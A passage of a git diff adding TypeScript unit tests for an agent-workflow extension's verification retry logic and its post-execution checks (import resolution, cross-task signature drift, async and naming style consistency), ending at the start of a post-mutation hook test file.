+    milestoneId: "M001",
+    title: "Test Slice",
+    risk: "low",
+  });
+
+  // Create a simple task
+  insertTask({
+    id: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Basic task",
+    status: "pending",
+    planning: {
+      description: "A basic task for testing",
+      estimate: "1h",
+      files: [],
+      verify: "echo pass", // Simple verification that always passes
+      inputs: [],
+      expectedOutput: ["output.ts"],
+      observabilityImpact: "",
+    },
+    sequence: 0,
+  });
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("Post-execution blocking failure retry bypass", () => {
+  beforeEach(() => {
+    setupTestEnvironment();
+  });
+
+  afterEach(() => {
+    cleanupTestEnvironment();
+  });
+
+  test("skips verification when unit type is not execute-task", async () => {
+    createBasicTask();
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_post: true,
+      verification_auto_fix: true,
+      verification_max_retries: 3,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+
+    const vctx: VerificationContext = { s, ctx, pi };
+    const result = await runPostUnitVerification(vctx, pauseAutoMock);
+
+    // Non-execute-task units should return "continue" immediately
+    assert.equal(result, "continue");
+    assert.equal(pauseAutoMock.mock.callCount(), 0);
+  });
+
+  test("returns continue when verification passes", async () => {
+    createBasicTask();
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_post: true,
+      verification_auto_fix: true,
+      verification_max_retries: 3,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "execute-task", id: "M001/S01/T01" });
+
+    const vctx: VerificationContext = { s, ctx, pi };
+    const result = await runPostUnitVerification(vctx, pauseAutoMock);
+
+    // When verification passes, should return "continue" and not call pauseAuto
+    assert.equal(result, "continue");
+    assert.equal(pauseAutoMock.mock.callCount(), 0);
+    
+    // Retry state should be cleared
+    assert.equal(s.pendingVerificationRetry, null);
+  });
+
+  test("verification retry count is cleared on success", async () => {
+    createBasicTask();
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_post: true,
+      verification_auto_fix: true,
+      verification_max_retries: 3,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "execute-task", id: "M001/S01/T01" });
+    
+    // Pre-set some retry state
+    s.verificationRetryCount.set("M001/S01/T01", 2);
+
+    const vctx: VerificationContext = { s, ctx, pi };
+    const result = await runPostUnitVerification(vctx, pauseAutoMock);
+
+    // On success, retry count should be cleared
+    assert.equal(result, "continue");
+    assert.equal(s.verificationRetryCount.has("M001/S01/T01"), false);
+  });
+
+  test("post-exec failure notification mentions cross-task consistency", async () => {
+    // This test verifies that the notification for post-exec failures includes
+    // the appropriate message about cross-task consistency issues.
+    // The actual post-exec failure would require specific file/output state
+    // that's harder to set up in a unit test, but we can verify the code path exists.
+    
+    createBasicTask();
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_post: true,
+      verification_auto_fix: true,
+      verification_max_retries: 3,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "execute-task", id: "M001/S01/T01" });
+
+    const vctx: VerificationContext = { s, ctx, pi };
+    const result = await runPostUnitVerification(vctx, pauseAutoMock);
+
+    // The verification should pass with our simple "echo pass" task
+    // This test mainly confirms the wiring is correct
+    assert.equal(result, "continue");
+  });
+});
+
+describe("Post-execution retry behavior", () => {
+  beforeEach(() => {
+    setupTestEnvironment();
+  });
+
+  afterEach(() => {
+    cleanupTestEnvironment();
+  });
+
+  test("when autofix is disabled, failure pauses immediately without retry", async () => {
+    // Create a task with a verify command that will fail
+    insertMilestone({ id: "M001" });
+    insertSlice({
+      id: "S01",
+      milestoneId: "M001",
+      title: "Test Slice",
+      risk: "low",
+    });
+    insertTask({
+      id: "T01",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Failing task",
+      status: "pending",
+      planning: {
+        description: "Task with failing verification",
+        estimate: "1h",
+        files: [],
+        verify: "exit 1", // This will fail
+        inputs: [],
+        expectedOutput: [],
+        observabilityImpact: "",
+      },
+      sequence: 0,
+    });
+
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_post: true,
+      verification_auto_fix: false, // Autofix disabled
+      verification_max_retries: 3,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "execute-task", id: "M001/S01/T01" });
+
+    const vctx: VerificationContext = { s, ctx, pi };
+    const result = await runPostUnitVerification(vctx, pauseAutoMock);
+
+    // When autofix is disabled and verification fails, should pause
+    assert.equal(result, "pause");
+    assert.equal(pauseAutoMock.mock.callCount(), 1);
+    
+    // Should NOT set up a retry
+    assert.equal(s.pendingVerificationRetry, null);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/post-execution-checks.test.ts b/src/resources/extensions/gsd/tests/post-execution-checks.test.ts
new file mode 100644
index 000000000..a70a5e962
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/post-execution-checks.test.ts
@@ -0,0 +1,813 @@
+/**
+ * post-execution-checks.test.ts — Unit tests for post-execution validation checks.
+ *
+ * Tests all 3 check types:
+ *   1. Import resolution — verify relative imports resolve to existing files
+ *   2. Cross-task signatures — detect signature drift and hallucination cascades
+ *   3. Pattern consistency — async style drift, naming convention warnings
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { tmpdir } from "node:os";
+import { mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+
+import {
+  extractRelativeImports,
+  resolveImportPath,
+  checkImportResolution,
+  checkCrossTaskSignatures,
+  checkPatternConsistency,
+  runPostExecutionChecks,
+  type PostExecutionResult,
+} from "../post-execution-checks.ts";
+import type { TaskRow } from "../gsd-db.ts";
+
+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+/**
+ * Create a minimal TaskRow for testing.
+ */
+function createTask(overrides: Partial<TaskRow> = {}): TaskRow {
+  return {
+    milestone_id: "M001",
+    slice_id: "S01",
+    id: overrides.id ?? "T01",
+    title: "Test Task",
+    status: "complete",
+    one_liner: "",
+    narrative: "",
+    verification_result: "",
+    duration: "",
+    completed_at: new Date().toISOString(),
+    blocker_discovered: false,
+    deviations: "",
+    known_issues: "",
+    key_files: overrides.key_files ?? [],
+    key_decisions: [],
+    full_summary_md: "",
+    description: overrides.description ?? "",
+    estimate: "",
+    files: overrides.files ?? [],
+    verify: "",
+    inputs: overrides.inputs ?? [],
+    expected_output: overrides.expected_output ?? [],
+    observability_impact: "",
+    full_plan_md: "",
+    sequence: overrides.sequence ?? 0,
+    ...overrides,
+  };
+}
+
+// ─── Import Extraction Tests ─────────────────────────────────────────────────
+
+describe("extractRelativeImports", () => {
+  test("extracts import ... from statements", () => {
+    const source = `
+import { foo } from './utils';
+import bar from "../helpers/bar";
+    `;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 2);
+    assert.ok(imports.some((i) => i.importPath === "./utils"));
+    assert.ok(imports.some((i) => i.importPath === "../helpers/bar"));
+  });
+
+  test("extracts side-effect imports", () => {
+    const source = `import './polyfill';`;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 1);
+    assert.equal(imports[0].importPath, "./polyfill");
+  });
+
+  test("extracts require statements", () => {
+    const source = `
+const utils = require('./utils');
+const { bar } = require("../helpers/bar");
+    `;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 2);
+    assert.ok(imports.some((i) => i.importPath === "./utils"));
+    assert.ok(imports.some((i) => i.importPath === "../helpers/bar"));
+  });
+
+  test("ignores non-relative imports", () => {
+    const source = `
+import express from 'express';
+import { readFile } from 'node:fs';
+const lodash = require('lodash');
+    `;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 0);
+  });
+
+  test("reports correct line numbers", () => {
+    const source = `// comment
+import { a } from './a';
+// another comment
+import { b } from './b';
+`;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 2);
+    const importA = imports.find((i) => i.importPath === "./a");
+    const importB = imports.find((i) => i.importPath === "./b");
+    assert.equal(importA?.lineNum, 2);
+    assert.equal(importB?.lineNum, 4);
+  });
+
+  test("handles multiple imports on same line", () => {
+    const source = `import a from './a'; import b from './b';`;
+    const imports = extractRelativeImports(source);
+    assert.equal(imports.length, 2);
+  });
+
+  test("handles empty source", () => {
+    const imports = extractRelativeImports("");
+    assert.deepEqual(imports, []);
+  });
+});
+
+// ─── Import Resolution Tests ─────────────────────────────────────────────────
+
+describe("resolveImportPath", () => {
+  let tempDir: string;
+
+  test("resolves file with exact extension", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils.ts"), "export const a = 1;");
+    writeFileSync(join(tempDir, "src", "main.ts"), "import { a } from './utils';");
+
+    try {
+      const result = resolveImportPath("./utils", "src/main.ts", tempDir);
+      assert.ok(result.exists);
+      assert.ok(result.resolvedPath?.endsWith("utils.ts"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("resolves file without extension", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "helpers.js"), "module.exports = {};");
+    writeFileSync(join(tempDir, "src", "index.ts"), "");
+
+    try {
+      const result = resolveImportPath("./helpers", "src/index.ts", tempDir);
+      assert.ok(result.exists);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("resolves directory index file", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src", "utils"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils", "index.ts"), "export {};");
+    writeFileSync(join(tempDir, "src", "main.ts"), "");
+
+    try {
+      const result = resolveImportPath("./utils", "src/main.ts", tempDir);
+      assert.ok(result.exists);
+      assert.ok(result.resolvedPath?.endsWith("index.ts"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("resolves parent directory imports", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src", "nested"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils.ts"), "export {};");
+    writeFileSync(join(tempDir, "src", "nested", "child.ts"), "");
+
+    try {
+      const result = resolveImportPath("../utils", "src/nested/child.ts", tempDir);
+      assert.ok(result.exists);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("fails for non-existent file", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "main.ts"), "");
+
+    try {
+      const result = resolveImportPath("./nonexistent", "src/main.ts", tempDir);
+      assert.ok(!result.exists);
+      assert.equal(result.resolvedPath, null);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("handles explicit extension in import", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "data.json"), "{}");
+    writeFileSync(join(tempDir, "src", "main.ts"), "");
+
+    try {
+      const result = resolveImportPath("./data.json", "src/main.ts", tempDir);
+      assert.ok(result.exists);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── Import Resolution Check Tests ───────────────────────────────────────────
+
+describe("checkImportResolution", () => {
+  let tempDir: string;
+
+  test("passes when all imports resolve", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils.ts"), "export const a = 1;");
+    writeFileSync(
+      join(tempDir, "src", "main.ts"),
+      "import { a } from './utils';"
+    );
+
+    try {
+      const task = createTask({
+        id: "T01",
+        key_files: ["src/main.ts"],
+      });
+
+      const results = checkImportResolution(task, [], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("fails when import doesn't resolve", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "main.ts"),
+      "import { a } from './nonexistent';"
+    );
+
+    try {
+      const task = createTask({
+        id: "T01",
+        key_files: ["src/main.ts"],
+      });
+
+      const results = checkImportResolution(task, [], tempDir);
+      assert.equal(results.length, 1);
+      assert.equal(results[0].category, "import");
+      assert.equal(results[0].passed, false);
+      assert.equal(results[0].blocking, true);
+      assert.ok(results[0].message.includes("nonexistent"));
+      assert.ok(results[0].target.includes("src/main.ts"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("skips non-JS/TS files", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(join(tempDir, "README.md"), "# Docs");
+
+    try {
+      const task = createTask({
+        id: "T01",
+        key_files: ["README.md"],
+      });
+
+      const results = checkImportResolution(task, [], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("handles multiple files with multiple imports", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils.ts"), "export const a = 1;");
+    writeFileSync(
+      join(tempDir, "src", "a.ts"),
+      "import { a } from './utils';\nimport { b } from './missing';"
+    );
+    writeFileSync(
+      join(tempDir, "src", "b.ts"),
+      "import { x } from './also-missing';"
+    );
+
+    try {
+      const task = createTask({
+        id: "T01",
+        key_files: ["src/a.ts", "src/b.ts"],
+      });
+
+      const results = checkImportResolution(task, [], tempDir);
+      assert.equal(results.length, 2);
+      assert.ok(results.some((r) => r.message.includes("missing")));
+      assert.ok(results.some((r) => r.message.includes("also-missing")));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("skips if key_file doesn't exist", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const task = createTask({
+        id: "T01",
+        key_files: ["src/deleted.ts"],
+      });
+
+      const results = checkImportResolution(task, [], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── Cross-Task Signature Tests ──────────────────────────────────────────────
+
+describe("checkCrossTaskSignatures", () => {
+  let tempDir: string;
+
+  test("passes when no prior tasks exist", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      "export function getData(): string { return ''; }"
+    );
+
+    try {
+      const task = createTask({
+        id: "T02",
+        key_files: ["src/api.ts"],
+      });
+
+      const results = checkCrossTaskSignatures(task, [], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("passes when signatures match", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "utils.ts"),
+      "export function process(data: string): boolean { return true; }"
+    );
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      "export function process(data: string): boolean { return false; }"
+    );
+
+    try {
+      const priorTask = createTask({
+        id: "T01",
+        key_files: ["src/utils.ts"],
+      });
+      const currentTask = createTask({
+        id: "T02",
+        key_files: ["src/api.ts"],
+      });
+
+      const results = checkCrossTaskSignatures(currentTask, [priorTask], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("warns on parameter mismatch (non-blocking)", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "utils.ts"),
+      "export function save(name: string): void {}"
+    );
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      "export function save(name: string, id: number): void {}"
+    );
+
+    try {
+      const priorTask = createTask({
+        id: "T01",
+        key_files: ["src/utils.ts"],
+      });
+      const currentTask = createTask({
+        id: "T02",
+        key_files: ["src/api.ts"],
+      });
+
+      const results = checkCrossTaskSignatures(currentTask, [priorTask], tempDir);
+      assert.equal(results.length, 1);
+      assert.equal(results[0].category, "signature");
+      assert.equal(results[0].target, "save");
+      assert.equal(results[0].passed, false);
+      assert.equal(results[0].blocking, false);
+      assert.ok(results[0].message.includes("parameters"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("warns on return type mismatch (non-blocking)", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "utils.ts"),
+      "export function fetch(): string { return ''; }"
+    );
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      "export function fetch(): number { return 0; }"
+    );
+
+    try {
+      const priorTask = createTask({
+        id: "T01",
+        key_files: ["src/utils.ts"],
+      });
+      const currentTask = createTask({
+        id: "T02",
+        key_files: ["src/api.ts"],
+      });
+
+      const results = checkCrossTaskSignatures(currentTask, [priorTask], tempDir);
+      assert.equal(results.length, 1);
+      assert.ok(results[0].message.includes("return"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("handles multiple prior tasks", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "types.ts"),
+      "export function parse(s: string): object { return {}; }"
+    );
+    writeFileSync(
+      join(tempDir, "src", "utils.ts"),
+      "export function validate(x: object): boolean { return true; }"
+    );
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      `export function parse(s: number): object { return {}; }
+       export function validate(x: object): boolean { return true; }`
+    );
+
+    try {
+      const priorTask1 = createTask({ id: "T01", key_files: ["src/types.ts"] });
+      const priorTask2 = createTask({ id: "T02", key_files: ["src/utils.ts"] });
+      const currentTask = createTask({ id: "T03", key_files: ["src/api.ts"] });
+
+      const results = checkCrossTaskSignatures(
+        currentTask,
+        [priorTask1, priorTask2],
+        tempDir
+      );
+      // Should have 1 warning for parse() parameter mismatch
+      assert.equal(results.length, 1);
+      assert.ok(results[0].message.includes("parse"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── Pattern Consistency Tests ───────────────────────────────────────────────
+
+describe("checkPatternConsistency", () => {
+  let tempDir: string;
+
+  test("passes when async style is consistent (await only)", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(
+      join(tempDir, "api.ts"),
+      `async function getData(): Promise<string> {
+        const result = await fetch('/api');
+        return await result.text();
+      }`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["api.ts"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      const asyncResults = results.filter((r) => r.message.includes("async"));
+      assert.equal(asyncResults.length, 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("passes when async style is consistent (.then only)", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(
+      join(tempDir, "api.ts"),
+      `function getData(): Promise<string> {
+        return fetch('/api').then(r => r.text());
+      }`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["api.ts"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      const asyncResults = results.filter((r) => r.message.includes("async"));
+      assert.equal(asyncResults.length, 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("warns when mixing async/await with .then()", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(
+      join(tempDir, "api.ts"),
+      `async function getData(): Promise<string> {
+        const result = await fetch('/api');
+        return result.text().then(t => t.toUpperCase());
+      }`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["api.ts"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      const asyncResults = results.filter((r) => r.message.includes("async"));
+      assert.equal(asyncResults.length, 1);
+      assert.equal(asyncResults[0].category, "pattern");
+      assert.equal(asyncResults[0].passed, true); // Warning only
+      assert.equal(asyncResults[0].blocking, false);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("passes when naming is consistent (camelCase only)", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(
+      join(tempDir, "api.ts"),
+      `function getUserData() {}
+       const processItems = () => {};
+       function validateInput() {}`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["api.ts"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      const namingResults = results.filter((r) => r.message.includes("naming") || r.message.includes("Case"));
+      assert.equal(namingResults.length, 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("warns when mixing camelCase and snake_case", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(
+      join(tempDir, "api.ts"),
+      `function getUserData() {}
+       function process_items() {}
+       const validate_input = () => {};`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["api.ts"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      const namingResults = results.filter((r) => r.message.includes("camelCase") || r.message.includes("snake_case"));
+      assert.equal(namingResults.length, 1);
+      assert.equal(namingResults[0].category, "pattern");
+      assert.equal(namingResults[0].blocking, false);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("skips non-JS/TS files", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(join(tempDir, "config.json"), '{"key": "value"}');
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["config.json"] });
+      const results = checkPatternConsistency(task, [], tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── runPostExecutionChecks Integration Tests ────────────────────────────────
+
+describe("runPostExecutionChecks", () => {
+  let tempDir: string;
+
+  test("returns pass status when all checks pass", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(join(tempDir, "src", "utils.ts"), "export const a = 1;");
+    writeFileSync(
+      join(tempDir, "src", "main.ts"),
+      `import { a } from './utils';
+       function processData(): void {}`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["src/main.ts"] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.equal(result.status, "pass");
+      assert.equal(result.checks.length, 0);
+      assert.ok(result.durationMs >= 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("returns fail status when blocking failure exists", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "main.ts"),
+      "import { a } from './nonexistent';"
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["src/main.ts"] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.equal(result.status, "fail");
+      assert.ok(result.checks.length > 0);
+      assert.ok(result.checks.some((c) => c.blocking === true));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("returns warn status for non-blocking issues only", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      `async function getData() {
+        const result = await fetch('/api');
+        return result.text().then(t => t);
+      }`
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["src/api.ts"] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.equal(result.status, "warn");
+      assert.ok(result.checks.some((c) => c.category === "pattern"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("combines results from all check types", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "utils.ts"),
+      "export function process(s: string): void {}"
+    );
+    writeFileSync(
+      join(tempDir, "src", "api.ts"),
+      `import { x } from './missing';
+       async function getData() {
+         await fetch('/api');
+         return fetch('/api2').then(r => r);
+       }
+       export function process(n: number): void {}`
+    );
+
+    try {
+      const priorTask = createTask({ id: "T01", key_files: ["src/utils.ts"] });
+      const currentTask = createTask({ id: "T02", key_files: ["src/api.ts"] });
+
+      const result = runPostExecutionChecks(currentTask, [priorTask], tempDir);
+      assert.equal(result.status, "fail"); // Import failure is blocking
+
+      const categories = new Set(result.checks.map((c) => c.category));
+      assert.ok(categories.has("import")); // From unresolved import
+      assert.ok(categories.has("signature")); // From signature mismatch
+      assert.ok(categories.has("pattern")); // From async style drift
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("reports duration in milliseconds", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const task = createTask({ id: "T01", key_files: [] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.ok(typeof result.durationMs === "number");
+      assert.ok(result.durationMs >= 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("handles empty key_files array", () => {
+    tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const task = createTask({ id: "T01", key_files: [] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.equal(result.status, "pass");
+      assert.deepEqual(result.checks, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── PostExecutionResult Type Tests ──────────────────────────────────────────
+
+describe("PostExecutionResult type", () => {
+  test("status is one of pass, warn, fail", () => {
+    const tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const task = createTask({ id: "T01", key_files: [] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+      assert.ok(["pass", "warn", "fail"].includes(result.status));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("checks array matches PostExecutionCheckJSON schema", () => {
+    const tempDir = join(tmpdir(), `post-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    mkdirSync(join(tempDir, "src"), { recursive: true });
+    writeFileSync(
+      join(tempDir, "src", "main.ts"),
+      "import { a } from './missing';"
+    );
+
+    try {
+      const task = createTask({ id: "T01", key_files: ["src/main.ts"] });
+      const result = runPostExecutionChecks(task, [], tempDir);
+
+      for (const check of result.checks) {
+        assert.ok(
+          ["import", "signature", "pattern"].includes(check.category),
+          `Invalid category: ${check.category}`
+        );
+        assert.ok(typeof check.target === "string");
+        assert.ok(typeof check.passed === "boolean");
+        assert.ok(typeof check.message === "string");
+        if (check.blocking !== undefined) {
+          assert.ok(typeof check.blocking === "boolean");
+        }
+      }
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/post-mutation-hook.test.ts b/src/resources/extensions/gsd/tests/post-mutation-hook.test.ts
new file mode 100644
index 000000000..929c62dad
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/post-mutation-hook.test.ts
@@ -0,0 +1,171 @@
+// GSD Extension — post-mutation hook regression tests
+// Verifies that after a successful handleCompleteTask call, the post-mutation
+// hook fires: event-log.jsonl and state-manifest.json are both written.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
